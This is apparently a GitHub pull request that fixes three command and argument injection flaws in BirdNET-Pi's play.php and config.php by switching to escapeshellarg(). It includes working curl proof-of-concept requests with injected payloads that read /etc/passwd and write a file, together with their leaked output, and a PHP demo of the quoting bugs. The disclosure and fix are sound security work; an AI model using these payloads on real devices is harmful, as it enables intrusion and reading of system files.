Fix command injection in newname, shiftfile, and sendtest #629

Open
twinvega wants to merge 1 commit into Nachtzuster:main from twinvega:fix/security-command-injection-sqli
@twinvega twinvega commented Jun 4, 2026

Fix command injection in newname, shiftfile, and sendtest

Three files had user-controlled values passed unescaped into shell commands. All require authentication to reach. None of these are addressed by PR #575.


1. play.php: newname parameter (command injection) ✓ confirmed

Vulnerable code:

exec("...birdnet_changeidentification.sh \"$oldname\" \"$newname\" ...")

$newname is urldecode($_GET['newname']) with no shell escaping. FILTER_SANITIZE_STRING encodes " to &#34;, preventing direct quote breakout — but $() command substitution executes inside double-quoted bash strings and passes through the filter unchanged.

Request:

curl -s -u "birdnet:" \
  "http://birdnetpi.local/play.php?changefile=2024-01-01/American_Crow/bird.wav&newname=%24%28cat+/etc/passwd%29"

Response:

Error : Error: root:x:0:0:root:/root:/bin/bash, daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin,
bin:x:2:2:bin:/bin:/usr/sbin/nologin, ... vega:x:1000:1000::/home/vega:/bin/bash ...
not found in /home/vega/BirdNET-Pi/model/labels.txt

2. play.php: shiftfile, $dir in mkdir (command injection) ✓ confirmed

Vulnerable code:

$dir = pathinfo($_GET['shiftfile'])['dirname'];
shell_exec("sudo mkdir -p ".$shifted_path.$dir." && ".$cmd);

$dir is unquoted in the mkdir call. A ; after a valid path segment executes a second command. Output is blind so a file write confirms execution.

Request:

curl -s -u "birdnet:" \
  "http://birdnetpi.local/play.php?shiftfile=2024-01-01/American_Crow%3Btouch+/tmp/this_is_vulnerable%3B%23/bird.wav&doshift=true"

Response:

OK

Verify: SSH into the host and check that /tmp/this_is_vulnerable exists.


3. config.php: apprise_notification_title in sendtest (argument injection) ✓ confirmed

Vulnerable code:

$cmd = "...send_test_notification.py --body $t_body_path --config $t_conf_path --title '" . escapeshellcmd($title) . "' 2>&1";

escapeshellcmd() does not escape paired single quotes. Injecting ' --config <file> --title ' overrides the Apprise config path with any file on disk. Apprise attempts to parse it as a notification config and echoes the first non-comment line in the error output — fully in-band, no external service required.

Request:

curl -s -u "birdnet:" \
  "http://birdnetpi.local/scripts/config.php?sendtest=true&apprise_notification_title='%20--config%20/etc/passwd%20--title%20'&apprise_notification_body=x&apprise_config=x" \
  | grep -oP '(?<=found ).*(?= on line)'

Response:

root:x:0:0:root:/root:/bin/bash

Fix

Replace string interpolation with escapeshellarg() in all three locations. 3 lines changed across 2 files.
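
The three quoting patterns above next to their escapeshellarg() form, as an added example that is not part of the PR or of BirdNET-Pi's code. It assumes a POSIX shell behind shell_exec(); `printf` stands in for the real scripts, and the inputs, the `/tmp/shifted/` base path and the `OTHER` value are constructed placeholders.

```php
<?php
// Added example, not BirdNET-Pi code. Run on a POSIX host: php demo.php
// printf stands in for the real scripts and prints one [argument] per line,
// so the output shows what the shell actually passes to the program.
$probe = 'printf "[%s]\n" ';

// Constructed inputs with the same shapes as the three parameters in the PR.
$newname = '$(echo SUBSTITUTED)';                 // command substitution
$dir     = 'American_Crow;echo SECOND_COMMAND;#'; // separator plus comment
$title   = "' --config OTHER --title '";          // paired single quotes
$base    = '/tmp/shifted/';                       // hypothetical stand-in for $shifted_path

// Each case: [command line built the old way, command line using escapeshellarg()].
$cases = [
    'newname inside double quotes' => [
        $probe . "\"$newname\"",
        $probe . escapeshellarg($newname),
    ],
    'dir concatenated unquoted' => [
        $probe . $base . $dir . ' && echo DONE',
        $probe . escapeshellarg($base . $dir) . ' && echo DONE',
    ],
    'title wrapped in escapeshellcmd' => [
        $probe . "--title '" . escapeshellcmd($title) . "'",
        $probe . '--title ' . escapeshellarg($title),
    ],
];

foreach ($cases as $label => [$before, $after]) {
    echo "== $label ==\n";
    foreach (['before' => $before, 'after' => $after] as $tag => $cmdline) {
        // Show the exact string handed to /bin/sh, then what the shell did with it.
        echo "$tag: $cmdline\n";
        echo (string) shell_exec($cmdline), "\n";
    }
}
```

In each "after" run the input reaches the program as one literal argument; in the "before" runs the shell expands it, splits it into a second command, or re-tokenizes it into extra options.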

…lete

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
@twinvega twinvega marked this pull request as ready for review June 4, 2026 17:25
twinvega commented Jun 4, 2026

This assumes a user that has not changed the default authentication for the WebUI.

@7h30th3r0n3

same conclusion with some add
